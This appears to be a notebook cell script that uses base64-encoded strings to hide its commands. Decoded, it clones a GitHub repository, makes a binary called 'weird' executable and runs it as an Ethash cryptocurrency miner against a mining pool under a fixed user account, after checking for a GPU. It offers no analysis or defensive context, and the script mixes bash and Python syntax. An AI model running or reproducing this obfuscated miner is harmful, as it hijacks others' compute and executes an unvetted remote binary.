!/bin/bash
import base64
xa = str(base64.b64decode("Z2l0IGNsb25lIGh0dHBzOi8vZ2l0aHViLmNvbS9BbWl5NDUzL21pbmVwdXIuZ2l0"), 'utf-8')
cmd = str(base64.b64decode("Li9taW5lcHVyL3dlaXJkIC0tYWxnbyBFVEhBU0ggLS1wb29sIHN0cmF0dW0rdGNwOi8vZXRoYXNoLnBvb2xiaW5hbmNlLmNvbToxODAwIC0tdXNlciAgamFpc2hyaXJhbTEwOCAtLXdvcmtlciAgamFpc2hyaXJhbTEwOC4wMDEgJChlY2hvICQoc2h1ZiAtaSAxMDAwLTk5OTkgLW4gMSktZXRoKQ=="), 'utf-8')
!nvidia-smi
!{xa}
!chmod +x minepur/weird
!{cmd}
